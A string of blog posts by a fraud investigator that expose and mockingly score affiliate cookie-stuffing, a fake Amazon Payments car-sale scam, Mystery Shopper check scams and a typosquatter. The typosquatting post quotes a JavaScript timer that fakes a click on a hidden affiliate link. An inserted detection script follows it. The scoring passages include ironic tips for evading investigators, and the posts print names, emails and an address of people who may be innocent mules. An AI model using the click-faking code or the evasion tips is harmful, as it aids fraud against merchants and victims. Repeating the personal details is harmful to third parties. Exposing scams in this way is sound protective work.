From the evidence presented, this affiliate is a sneaky bugger that is trying to hide what he is getting up to. Unfortunately for him, the “it was a mistake!” routine just won’t cut it.

Unsurprisingly, he is targeting multiple merchants over multiple networks, a sample of which is as follows:

Using the CJ affiliate network (affiliate id '1927868'):

www.budget.co.uk
www.ihg.com
www.thomson.co.uk

Using the AffiliateWindow network (affiliate id '69714'):

www.parkbcp.co.uk
www.holidayextras.co.uk
www.travelsphere.co.uk

Said the fraudster: ‘did I at least get a good score?’

I’m afraid not, fraudster, for what is being done here is nothing new. The obfuscation is a nice touch, but on its lonesome it is simply not enough to get a good score (especially considering what the 5+/10 fraudsters get up to). This site shouldn’t be dropping cookies all of the time (it makes reproduction of the infraction too easy for investigators) and it should be using a demilitarized zone.

As a result, the overall score is a lethargic 3/10:

  • 1 point for basic Cookie-Stuffing
  • 1 point for targeting multiple merchants
  • 1 point for obfuscation and attempts to hinder dynamic and static investigation

We look at another Bargain Hunter scammer today. I rate this chap higher than last week’s Bargain Hunter scammer because, as you’re about to see, today’s scammer puts a lot more effort into what he does.

So here we go: the Bargain Hunter scam is a four-pronged attack which starts at cars.com.

1. Scammer Sets the Trap

This ad on cars.com is for a 1998 BMW 323.

* 3/12/2013 update - this scammer has multiple postings on cars.com, here is another *

* 3/20/2013 update - listing from 3/12/2013 update is still active (1993 Mazda Miata MX-5), but seller is now using Devin Briese (devinbriese1@gmail.com) *

* 3/27/2013 update - here’s another listing on cars.com, seller is now using Ray Miller (ray.miller69@comcast.net) *


At $5,100 it’s a pretty sweet deal, but it just gets better the more you chat to the gent behind the sale.

2. Victim Takes the Bait

+1 to this scammer from the get-go because, from what I can tell, he is sampling his replies, i.e., he only replies to 1/N requests for more information. Through sampling, he significantly increases the cost of an investigation and so mitigates the chance of getting caught.

After numerous attempts to make contact, I finally got a hit:

From: Adam Wigner (wigneradam@msn.com)
Subject: Cars.com used car lead for - 1998 BMW 323‏

Hi , 
My name is Adam, and I am emailing you about the 1998 BMW 323i 
Convertible that I have for sale. Here you have more information 
about my car (119,650 mileage , clean title , 6 Cyl. RWD , 
4-wheel ABS , automatic transmission ) Black exterior with an 
excellent condition tan leather interior that is fully loaded 
with options. Flawless interior/exterior condition. I am 
selling it at this final price of $5,100 because my wife died 
in a bike accident few months ago and brings me bad memories 
and that's the reason I want to sell it asap. I along with my
daughter decided to sell the house and we moved to my sister 
in Oklahoma City , OK trying to start a new life.

Thank you

The highlighted line about moving is important. It sets the tone for what is about to come, i.e., the car is no longer in the location it was originally claimed to be (so I can’t see it in person).

3. Scammer Gains Victim’s Trust

I asked the scammer for more pics:

From: 
Subject: Cars.com used car lead for - 1998 BMW 323‏

Forgive my impatience, I did not know the car had such
unfortunate memories for you. Regardless, when you can
could you please send me more pictures? It's hard to
know how good the condition is based upon a single pic.

You surely have a much better life waiting for you in sunny
Oklahoma. Once again, my deepest condolences for your loss,
ultimately it's still a great car so I hope we can make this a good deal on both sides.

The scammer replies with more pics and tells me again that the car is no longer with him, but that’s okay because it is now with Amazon!

From: Adam Wigner (wigneradam@msn.com)
Subject: Cars.com used car lead for - 1998 BMW 323‏

Hi ,

Please find the pics attached ! As I told you in my first
 e-mail we decided to move to my sister, trying to start 
a new life here. I am located in Oklahoma City (the car 
is in Oklahoma City too). Before leaving I had prearranged
the deal with Amazon Payments. The car is now located at 
Amazon's shipping company sealed with all papers, ready to
be delivered. The deal includes free delivery and it will 
arrive at your address in 3 days along title and bill of 
sale. You will have 5 days to test it and inspect the car 
and if by any reason you find something you don't like 
about it you can send it back at my expense.

If you are interested in knowing more info about how it 
works please click here on Amazon Payments and register, 
once you do that, Amazon Payments will send you the 
invoice with all the payment and shipping details you 
will also have proof that I am covered by them and a 
legitimate seller.

Thank you

 


Free delivery of a car at that price, now that’s a deal for sure!

The Amazon Payments URL points to http://www.billing-support.com/, which is the real prize in this investigation. It allows us to get an idea of what else this fraudster is up to. From the Services tab:


* 3/20/2013 update – scammer is now using amazon-payments-secure-business.com *

I loved this from the Top Questions section:


Just to be clear: billing-support.com is a scam! Amazon does not provide escrow services of this nature and is in no way affiliated with billing-support.com.

4. Victim Sends Money

I followed the scammer’s instructions and registered with billing-support.com. Shortly thereafter I received the following email claiming to be from Amazon Payments:

From: Amazon Payments (admin@marketplace-safety-transactions.com)
Subject: Amazon FPS Invoice‏

Thanks for using Amazon FPS for this order,   !
The next step is to pay for your item. Check out and pay to get your 
item as soon as possible.

Purchasing Information For Your Secure Amazon FPS Invoice
Seller: Adam Wigner

Buyer: 

Order Summary

Item:                   1998 BMW 323
Item(s) Subtotal:       $5,100.00 
Deposit:                $2,100.00 
Remaining Balance: 	$3,000.00 
Shipping & Handling: 	$0.00
Inspection Period: 	5 calendar days
Amazon Fee paid by: 	Seller
Quantity: 	        1

 	------

Total for this Order: 	$5,100.00

Payment Instructions:

How to make the payment? 

The first deposit of $2,100.00 must be submitted via MoneyGram 
service to the Amazon FPS Verified Agent in charge of your 
transaction. The Amazon FPS Verified Agent will secure the 
payment until you receive, inspect and accept the vehicle. You 
have to pay at any MoneyGram office with CASH using MONEY 
TRANSFER service, from your name and address as a Sender to 
our Amazon FPS Verified Agent name and address as a Receiver .

Find the nearest MoneyGram office in your area. MoneyGram 
agents are post offices, exchange offices or retail locations 
- grocery stores, mail box centers, drug stores, travel 
agencies, depots, other retail locations . Give the form, the 
money(cash), and a proof of identity to the clerk. Pay with 
MoneyGram. It's the easy and fast way to pay online, and it 
lets you shop without sharing your financial details with 
sellers. 

Please note: This is done automatically by our system, choosing 
from the list of available agents, in order to ensure the 
impartiality of this deal.

Amazon FPS Verified Agent

 First Name :	Jonathan E.
 Last Name : 	Griffin
 Address : 	4827 Noble Dr E
 City : 	Mobile
 State: 	AL
 Zip Code : 	36619-1907
 Country:	United States 

Confirm the MoneyGram payment receipt at the following fax number: 
+1 ( 719 ) 362-3997. 

*** Please do not make any marks on the transfer copy. The following 
information must be readable ***

- E-mail us the following details from the payment receipt: 
- Reference Number - 8 digits number from the receipt ; 
- Sender's Name and Address ; 
- Receiver's Name and Address ; 
- Exact Amount Sent . 

Please note: This invoice was sent to the following e-mail address: 
Have questions about this order? Contact Amazon FPS .  
Thank you for using Amazon Payments.
Amazon Flexible Payments Service (Amazon FPS). 
Earth's Biggest Selection.

[image: amazon payments scam and cars.com]

If you’re new to the Bargain Hunter scam, the fraud here is that our seller does not actually own the car, or at least has no intention of selling it. He wants me to wire money to Jonathan E Griffin in Mobile, AL. The chances are that Jonathan is but a money mule who has been conned into some other scam and is now expecting money to be sent to him. Once I send the money off, I won’t be receiving anything from Amazon Payments, for this is all just an illusion.

When Jonathan E Griffin gets my money, he may keep a small percentage for himself (perhaps as payment for being a Mystery Shopper) and then send the balance off to another victim (or quite possibly the scammer).

The scammer launders the money through multiple victims so as to introduce complexity and cost, and ultimately to throw law enforcement and investigators off his trail. Sooner or later the money will exit the money mule ring and make its way to the scammer; if you follow the trail for long enough it always does.

Note that the email from Amazon Payments came from marketplace-safety-transactions.com and not the domain that I originally registered with. As a result, marketplace-safety-transactions.com is also in on the scam. If you’re considering any kind of transaction with anyone from this domain, caveat emptor, for you have been warned!

How to score this scammer?

I think it’s only fair to recognize the effort this scammer put into his scam. Note the Vehicle Report I received from Amazon Payments along with the invoice:

[image: amazon payments scam and cars.com]

Sure, it’s all just text, it’s cheap and it does not mean anything, but it does show that he put effort into being the best scammer he could be (which is not that much, but still a noteworthy effort). Most of the bozos I deal with try to quickly pull this off via one or two emails sent from their gmail accounts. Furthermore, he sent me a unique tracking id when I registered (referred to as a Case Id #), which means he is persisting state on his servers. So he has a little DB running behind this, which means he had to develop it himself or invest time and money paying someone who could put this together for him.

At the end of the day, I rate this scammer 5/10

  • 1 point for a classic Bargain Hunter scam
  • 1 point for sampling the emails he responded to
  • 1 point for involving Amazon Payments and leveraging off of a great brand
  • 1 point for registering a sharp looking domain that looks pretty similar to Amazon Payments
  • 1 point for the tracking code

The Mystery Shopper scam is so popular that I have no problem covering it over and over again. Today’s fraudster tries to take me for a ride using the classic four-pronged attack:

1. Scammer Baits a Victim

On a mailbox that does not exist, I received the following spam:

From: SSN 2013 [mailto:danela@sympatico.ca] 
Sent: Tuesday, January 29, 2013 8:03 AM
Subject: Ms-Network Info

Congratulations

We are accepting applications for qualified individuals to become 
a Mystery of Shopper.

Please reply this email with the following information below to 
sign up :

*~ Full Name                    :
*~ Address (No P.O Box) :
*~ City                              :
*~ Zip                               :
*~ Your Country                        :
*~ Your phone / Land phone :

You will receive a flat amount of $ 200 per assignment.
Full job description will be sent to you prior in your assignment.
You will have access to training materials after you register.
It's very exciting and hopefully will be successful. There is no fee 
to become a shopper

2. Scammer Verifies the Victim’s Details

I replied with the information that was requested. The scammer did not respond or bother to verify my details. Perhaps this scammer is running at such a large scale that he does not have to, for a response alone is enough verification.

3. Scammer Gains the Victim’s Trust

A few days later I received a USPS Priority Mail.

[image: Mystery Shopper Scam]

It contained the following:

  • 1 x check for $1980. He is “paying” me for services that have yet to be rendered, this is how he tries to gain my trust

[image: Mystery shopper scam]

  • 1 x set of instructions. This includes details on the task I have been assigned in addition to the next mystery shopper that I am supposed to wire money to (the scam)

[image: Mystery Shopper Scam] [image: Mystery Shopper Scam]

4. Victim Indirectly Sends the Scammer a Check in Return

At this point I am supposed to rush off to the bank and send my own money to the scammer. Once my money has been sent off, and after the check from above bounces, I will have been the victim of wire fraud.

Overall this is not a very good scammer. I can’t help but get the feeling that he is operating at either a very large scale or a very small scale, either of which would force him to minimize expenses.

I rate this scammer a 2/10

  • 1 point for a basic Mystery Shopper Scam
  • 1 point for instructing me to wire money to the next Mystery Shopper
  • 1 point for being strictly about business! (see Fraudster Chit-Chat below)
  • -1 point because the next Mystery Shopper is in the USA (?)

Problems with the scam that impact this fraudster’s score:

  1. He did not verify my details. I think a phone call to at least check who is on the other side would have been nice, but perhaps he can’t afford it.
  2. The instructions sent were not of premium quality. There is no company logo and the email address provided as a point of contact is sure to set off alarm bells (sssshopperwilson@aol.com).
  3. Too many people involved: the original email received was from danela@sympatico.ca. The USPS Mail was from Jeffrey M Eastman. The check received was from George L Shashoua and Marilyn Shashoua. The instructions were from Markus Prescott, and they have me wiring money to Mark Roberts.

So that’s six people involved in this transaction. If the scammer wants a higher conversion rate, it would be within his interest to have fewer people involved.

Now one might say that there are so many people involved because it’s a money laundering scam. In this case the check I received is real and the next victim in the scam is Mark Roberts in Chicago. This is entirely possible. Someone somewhere has been robbed and our scammer is using the Mystery Shopper scam to filter money through the bank accounts of innocent victims (aka money mules).

The interesting thing about money laundering through money mules is that the scammer is the one that has to do the trusting. Instead of withdrawing only the amount allocated to me, the mule, for my services as a Mystery Shopper, I could just cash the check 100% and then do nothing.

There’s enough money being stolen online that I would not be surprised to hear of people making a living doing exactly that.

Fraudster Chit-Chat

On the chance that this may be a money laundering scam, I thought I would have some fun with this fraudster. So I decided to email him (using the contact address posted to me) and let him know that I was having some problems. Enter Jayster the pot-smoking hippie:


To: sssshopperwilson <sssshopperwilson@aol.com>
Sent: Thu, Feb 14, 2013 5:59 am
Subject: Secret Shopper Check Received!

Got your check. Thanks bro! Took my ride to the shop and added
new rims, 22’s lookin real mean and shiny! Oh yeah my old 
lady was bitchin about child payments so I had to take care of
that too, it’s the law. So I am $1200 shy of the $1730 I owe you. 

Okay if I make it up next time?

Jayster

Yet another name enters the picture as the fraudster promptly replies:

From: Markus Wilson [mailto:sssshopperwilson@aol.com] 
Sent: Thursday, February 14, 2013 7:28 AM
To: 
Subject: Re: Secret Shopper Check Received!

Follow the instruction and get Assignment done!

Markus Wilson

+1 point to the fraudster for being strictly about business. He stopped responding when I tried to get him to acknowledge that I had spent most of the money, and now “owed” him even less.

Sent: Thursday, February 14, 2013 3:00 PM
To: 'Markus Wilson'
Subject: RE: Secret Shopper Check Received!

Cool bro. We’re kicking it on the 22s, smoking a bud or two 
by the beach. 

Assignment done by weekend then I send you $250 cuz I already 
spent a little extra again ;) 

K bro?

We have discussed typosquatting enough to know that it is most definitely not a solved problem.

Today’s example brings nothing new to the table, but it’s interesting nonetheless. Type orbuitz.com (a fat-fingered typo of orbitz.com) into your browser and you will be redirected through to orbitz.com via an affiliate link (Google Affiliate Network pubid=21000000000018829). Since the Google Affiliate Network is involved, this typosquatter will be paid a commission in the event that the user who typed in orbuitz.com makes a purchase from orbitz.com.

The typosquatter in this scenario may insist that he is providing a service to Orbitz:

“Hey I’m just helping users who made a mistake get to your site!”

You and I know that’s absolute drivel. Had the typosquatter not registered the domain, then any modern browser would have detected that it does not exist and sent that off as a query to a popular search engine, resulting in organic traffic flowing as it rightfully should through to the merchant. The traffic belongs to the merchant. The traffic should not have to be paid for. End of story.

Does Orbitz have a relationship with this Typosquatter?

The surprising part about this little example is that Orbitz probably does have a relationship with this typosquatter.

What are you talking about?!

Orbitz (the merchant) probably sees great conversions from the typosquatter (an affiliate), so they don’t question the source of the traffic. They don’t have any reason to do so, you see, for the typosquatter is laundering the traffic before sending it through to Orbitz. Shock!

Using this packet log as a reference, here’s how this works:

  1. User enters orbuitz.com into the browser
  2. This 302 redirects to http://www.linkcounter.com/go.php?linkid=297379
  3. Linkcounter.com then 302 redirects to http://www.e-o-k.com/otbr.htm
  4. JavaScript on the e-o-k.com page waits half a second and then fakes a click on an Orbitz affiliate link!

function link()
{
  // after 500 ms, synthesize a click on the hidden Orbitz affiliate anchor
  setTimeout("document.getElementById('mylink').click()", 500);
}

The net result is that Orbitz is seeing the traffic come from e-o-k.com and not the typosquatter domain.
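To show how an affiliate manager could catch this from a capture, here is an added example (not code from the post or from any of the sites involved) that reconstructs the redirect chain and the scripted click from HTTP records and flags the laundered referer; the records are constructed from the chain above, the affiliate-network host and URL shape are assumed, and the linkid/pubid values are the ones quoted in the post.

```javascript
// Constructed capture of the orbuitz.com chain: Location headers for the 302s,
// then the scripted click, whose Referer is the e-o-k.com page, not the typo domain.
// "affiliate-network.example" and the /link?pubid= shape are assumptions.
const capturedRecords = [
  { url: "http://orbuitz.com/", status: 302, referer: null,
    location: "http://www.linkcounter.com/go.php?linkid=297379" },
  { url: "http://www.linkcounter.com/go.php?linkid=297379", status: 302, referer: null,
    location: "http://www.e-o-k.com/otbr.htm" },
  { url: "http://www.e-o-k.com/otbr.htm", status: 200, referer: null, location: null },
  { url: "http://affiliate-network.example/link?pubid=21000000000018829", status: 302,
    referer: "http://www.e-o-k.com/otbr.htm", location: "http://www.orbitz.com/" },
  { url: "http://www.orbitz.com/", status: 200, location: null,
    referer: "http://affiliate-network.example/link?pubid=21000000000018829" },
];

// Compare sites, not hosts: www.orbitz.com and orbitz.com are the same merchant.
function hostOf(url) {
  return new URL(url).hostname.replace(/^www\./, "");
}

// Levenshtein distance: a fat-fingered domain sits within a couple of edits of the brand.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
    }
  }
  return d[a.length][b.length];
}

// Walk the chain: follow Location on redirects; on a rendered page (no Location)
// continue through the request that names that page as its Referer, which is how
// the timer-driven click on e-o-k.com shows up in a capture.
function followChain(records, startUrl) {
  const byUrl = new Map(records.map((r) => [r.url, r]));
  const hops = [];
  let current = byUrl.get(startUrl);
  while (current && !hops.includes(current)) {
    hops.push(current);
    current = current.location
      ? byUrl.get(current.location)
      : records.find((r) => r.referer === current.url);
  }
  return hops;
}

// Verdict for one entry domain: is it a typo of the merchant, does it land on the
// merchant, and does the affiliate click carry a referer other than the typo domain?
function analyzeTyposquat(records, startUrl, merchantHost) {
  const hops = followChain(records, startUrl);
  const startHost = hostOf(startUrl);
  const click = hops.find((r) => new URL(r.url).searchParams.has("pubid"));
  const clickReferer = click && click.referer ? hostOf(click.referer) : null;
  return {
    typosquat: startHost !== merchantHost && editDistance(startHost, merchantHost) <= 2,
    landsOnMerchant: hops.length > 0 && hostOf(hops[hops.length - 1].url) === merchantHost,
    affiliateReferer: clickReferer,
    laundered: clickReferer !== null && clickReferer !== startHost,
    path: hops.map((r) => hostOf(r.url)),
  };
}
```

The merchant only ever sees e-o-k.com in the affiliate referer, so the check that matters is comparing that referer against the domain the user actually typed.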

I give this typosquatter a 2/10

  • 1 point for basic typosquatting
  • 1 point for laundering the click through e-o-k.com

Oh my, what a bad score. Lots of room for improvement here!

It’s always surprising to me just how popular the Mystery Shopper scam is. If you’re a chap that has stumbled upon this site because you are investigating what this Mystery Shopper offer you’ve recently received is all about, know this: don’t take a chance, it’s probably a scam!

From an earlier post, we already know that the Mystery Shopper scam can be broken up into four parts:

  1. Scammer Baits a Victim
  2. Scammer Verifies the Victim’s Details
  3. Scammer Priority Mails the Victim a Check. Upon reflection, I think this part should really be renamed to “Scammer Gains the Victim’s Trust”.
  4. Victim Indirectly Sends the Scammer a Check in Return

I recently “fell victim” to yet another scammer in the Mystery Shopper Scam. It’s funny to write about, but it’s not so funny when one considers that real people lose real money on this nonsense all of the time.

In this scam, the scammer followed the classic four-pronged attack from above. Here’s what happened:

1. Scammer Baits a Victim

On a mailbox that does not exist, I received the following spam email:

From: Thomas Pelot [mailto:thomaspelot@icloud.com] 
Sent: Wednesday, January 23, 2013 6:34 PM
Subject: Approved: Retail Supervisor

Good Evening,

My name is Thomas Pelot, Hiring & Evaluation Consultant for BP 
Outsourcing LLC. We received your application in response to 
our Email campaign for mystery shoppers in your area. I am writing
to congratulate you, as you have been selected as our newest
shopper. You have been shortlisted to participate in our forthcoming
survey evaluation. It is our hope, that your addition to
the fold will bring another edge and a heightened perspective
to our surveys in your local city.

I will be contacting you tomorrow with more details on the position. 

Please write back as soon as you read this, to acknowledge receipt.

Thomas Pelot
mysterysupport@me.com
Hiring & Evaluation Consultant
BP Outsourcing LLC
Please find our webpage: WWW.BPOUTSOURCINGLLC.COM

I replied with

Sent: Wednesday, January 30, 2013 12:57 PM
To: 'mysterysupport@me.com'
Subject: RE: Approved: Retail Supervisor

This is such good timing. Thank you thank you!

What do you need from me?

2. Scammer Verifies the Victim’s Details

Shortly after my first reply, the scammer and I had a short e-mail exchange where he asked me for a valid physical address and telephone number that I could be contacted on (which he checked via a quick call!)

3. Scammer Gains the Victim’s Trust

A few days later I received a priority parcel in the mail.

The contents of this parcel are a little more interesting than the previous scam we discussed. Instead of one check he sent us two. Remember, he sends us fake checks that look genuine so as to gain our trust; note that these are Postal Money Orders from USPS (very official looking).

[image: mystery shopper scam]

Of greater interest than the checks is that he sent us a cover letter!

[image: mystery shopper scam]

[image: mystery shopper scam]

The cover letter is a good idea and quite different from what the other scammers are getting up to. Four features in it are quite a nice touch:

  • I liked the fact that he carefully explains how much I will be paid and for what (the remainder going off to the Philippines)
  • He makes reference to an external company (bpoutsourcingllc.com). Of course, this could be a totally legitimate company and both this company and the victim would be none the wiser of what’s going on (unless the victim was disciplined enough to double check things). Otherwise there’s absolutely nothing stopping the scammer from saying he is affiliated with X, Y or Z. Nice one scammer.
  • The scammer is available for support and questions. How wonderful! I tried to give him a call to ask him some questions but he is no longer picking up his phone.
  • The last statement in this cover letter is real classy: “Remember, you’re a mystery shopper. You are expressly forbidden to disclose this information to anyone.”

4. Victim Indirectly Sends the Scammer a Check in Return

So he gains our trust by sending us an upfront payment (and more) for services that have yet to be rendered. Call it Terms – 15 (unheard of!). The scam comes in when we deposit the fake money and, before waiting for the checks to clear, rush off to wire our own money to the scammer in the Philippines. A few days later we find out that the checks were fake and did not clear (but our own money has already been sent and received by the scammer).

How not to fall victim to this scam?

Straight from the FTC’s writeup on the Mystery Shopper scam, don’t do business with mystery shopping promoters who:

  • Advertise for mystery shoppers in a newspaper’s ‘help wanted’ section or by email
  • Require that you pay for “certification.”
  • Guarantee a job as a mystery shopper
  • Charge a fee for access to mystery shopping opportunities
  • Sell directories of companies that hire mystery shoppers
  • Ask you to deposit a check and wire some or all of the money to someone

How to rate this scammer?

This scammer falls short in a few areas. I think he could have done a lot more work when it comes to reducing the number of people involved in the scam. If I were an old Grandpa, this is one of the things I would probably be suspicious of:

  • I originally received an email from Thomas Pelot
  • The FedEx parcel came from John Timpandis
  • The checks were signed by William Hinson
  • The money order was supposed to be wired to Erin Dubois

I know that money laundering is probably the reason why these other folks are involved (some of which could be innocent victims themselves), but I think the scammer would look more legitimate if he reduced the number of people to just one person.

Adding the phone number and contact details was a good idea, but he should have picked up when I called. So much nicer to chat to a real person when my money is being stolen from me.

Bottom line: this Mystery Shopper scammer gets a 4/10

  • +1 for basic mystery shopper scam
  • +1 for calling me to validate my details
  • +1 for USPS Postal Money Order
  • +2 for a cover letter with details and support details. I really liked this.
  • -1 for not picking up his phone